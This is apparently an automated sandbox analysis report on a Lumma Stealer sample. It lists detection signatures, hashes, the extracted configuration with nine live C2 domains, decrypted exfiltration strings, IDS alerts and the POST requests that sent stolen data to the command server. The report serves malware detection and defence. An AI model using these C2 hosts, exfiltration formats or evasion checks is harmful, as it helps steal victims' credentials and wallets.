
Windows Analysis Report
yO9EAqDV15.exe

Overview

General Information

Sample name:yO9EAqDV15.exe
renamed because original name is a hash value
Original sample name:dcbbfbd538d99feec781122f6c905c1b.exe
Analysis ID:1580269
MD5:dcbbfbd538d99feec781122f6c905c1b
SHA1:79c4ae40ce7ad4cdb319e7021d21b99f0390725f
SHA256:08c295782e51777d84b3ab08c49b1d3bedb4126fb88ed9ef47aa81fe8181adea
Tags:exeuser-abuse_ch

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • yO9EAqDV15.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\yO9EAqDV15.exe" MD5: DCBBFBD538D99FEEC781122F6C905C1B)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["observerfry.lat", "manyrestro.lat", "shapestickyr.lat", "wordyfindy.lat", "talkynicer.lat", "bashfulacid.lat", "slipperyloo.lat", "tentabatte.lat", "curverpluch.lat"], "Build id": "PsFKDg--pablo"}
Yara matches

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: yO9EAqDV15.exe PID: 7412 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: yO9EAqDV15.exe PID: 7412 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: yO9EAqDV15.exe PID: 7412 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Sigma: No Sigma rule has matched

Suricata alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T08:35:33.462263+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:35.436820+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:37.820054+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:40.333242+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:42.550856+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:45.127460+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:47.664337+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:52.048837+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49742 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:34.211279+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:36.203824+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:34.211279+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:36.203824+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:45.894729+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49735 | 172.67.199.72 | 443 | TCP


              AV Detection

Source: yO9EAqDV15.exe | Avira: detected
Source: yO9EAqDV15.exe.7412.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["observerfry.lat", "manyrestro.lat", "shapestickyr.lat", "wordyfindy.lat", "talkynicer.lat", "bashfulacid.lat", "slipperyloo.lat", "tentabatte.lat", "curverpluch.lat"], "Build id": "PsFKDg--pablo"}
Source: yO9EAqDV15.exe | ReversingLabs: Detection: 57%
Source: yO9EAqDV15.exe | Virustotal: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: yO9EAqDV15.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: bashfulacid.lat
Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: tentabatte.lat
Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: curverpluch.lat
Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: talkynicer.lat
Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: shapestickyr.lat
Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: manyrestro.lat
Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: slipperyloo.lat
Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: wordyfindy.lat
Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: observerfry.lat
Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: PsFKDg--pablo
Source: yO9EAqDV15.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49737 version: TLS 1.2

              Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49735 -> 172.67.199.72:443
Source: Malware configuration extractor | URLs: observerfry.lat
Source: Malware configuration extractor | URLs: manyrestro.lat
Source: Malware configuration extractor | URLs: shapestickyr.lat
Source: Malware configuration extractor | URLs: wordyfindy.lat
Source: Malware configuration extractor | URLs: talkynicer.lat
Source: Malware configuration extractor | URLs: bashfulacid.lat
Source: Malware configuration extractor | URLs: slipperyloo.lat
Source: Malware configuration extractor | URLs: tentabatte.lat
Source: Malware configuration extractor | URLs: curverpluch.lat
Source: Joe Sandbox View | IP Address: 172.67.199.72
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.199.72:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: observerfry.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 47; Host: observerfry.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=YQQFKK6DE2Y0H6; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 18139; Host: observerfry.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=KC6ECR53FPBPHPG89; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8778; Host: observerfry.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=SGHG9EE2; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 20377; Host: observerfry.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=851Y5PCU9; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 1211; Host: observerfry.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=VIKTP4GUVP9FTTVZ8IE; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 571708; Host: observerfry.lat
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: observerfry.lat
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: observerfry.lat
Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: yO9EAqDV15.exe, 00000000.00000003.2126187612.00000000017F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microp;
Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: yO9EAqDV15.exe, 00000000.00000003.2051214971.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2027251253.0000000005F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat/
Source: yO9EAqDV15.exe, 00000000.00000002.2138232883.0000000001810000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2092860657.0000000001809000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat/$
Source: yO9EAqDV15.exe, 00000000.00000003.2136977389.00000000017B4000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000002.2138085076.00000000017B4000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000002.2137952740.00000000017A3000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2136686014.00000000017A3000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2027843389.000000000181F000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2027207169.0000000005F65000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2027478035.000000000181F000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2126425221.00000000017B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat/api
Source: yO9EAqDV15.exe, 00000000.00000003.2126425221.00000000017B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat/apiw
Source: yO9EAqDV15.exe, 00000000.00000003.2092860657.0000000001809000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2079708593.0000000001809000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat/d
Source: yO9EAqDV15.exe, 00000000.00000002.2138232883.0000000001810000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2079708593.0000000001809000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat/pi
Source: yO9EAqDV15.exe, 00000000.00000002.2138232883.0000000001810000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2092860657.0000000001809000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2079708593.0000000001809000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat:443/apiexe
Source: yO9EAqDV15.exe, 00000000.00000002.2138232883.0000000001810000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2092860657.0000000001809000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat:443/apiy.exe
Source: yO9EAqDV15.exe, 00000000.00000003.1981644973.0000000005FC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.microsof
Source: yO9EAqDV15.exe, 00000000.00000003.2028984633.000000000608A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: yO9EAqDV15.exe, 00000000.00000003.2028984633.000000000608A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: yO9EAqDV15.exe, 00000000.00000003.2006014483.0000000005FB9000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1981644973.0000000005FC0000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1981727768.0000000005FB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: yO9EAqDV15.exe, 00000000.00000003.1981727768.0000000005F94000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: yO9EAqDV15.exe, 00000000.00000003.2006014483.0000000005FB9000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1981644973.0000000005FC0000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1981727768.0000000005FB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: yO9EAqDV15.exe, 00000000.00000003.1981727768.0000000005F94000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: yO9EAqDV15.exe, 00000000.00000003.2028984633.000000000608A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: yO9EAqDV15.exe, 00000000.00000003.2028984633.000000000608A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: yO9EAqDV15.exe, 00000000.00000003.2028984633.000000000608A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: yO9EAqDV15.exe, 00000000.00000003.2028984633.000000000608A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: yO9EAqDV15.exe, 00000000.00000003.2028984633.000000000608A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49737 version: TLS 1.2

              System Summary

              Source: yO9EAqDV15.exe | Static PE information: section name:
              Source: yO9EAqDV15.exe | Static PE information: section name: .idata
              Source: yO9EAqDV15.exe | Static PE information: section name:
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Code function: 0_3_017E178A
              Source: yO9EAqDV15.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: yO9EAqDV15.exe | Static PE information: Section: ZLIB complexity 0.9995212928921569
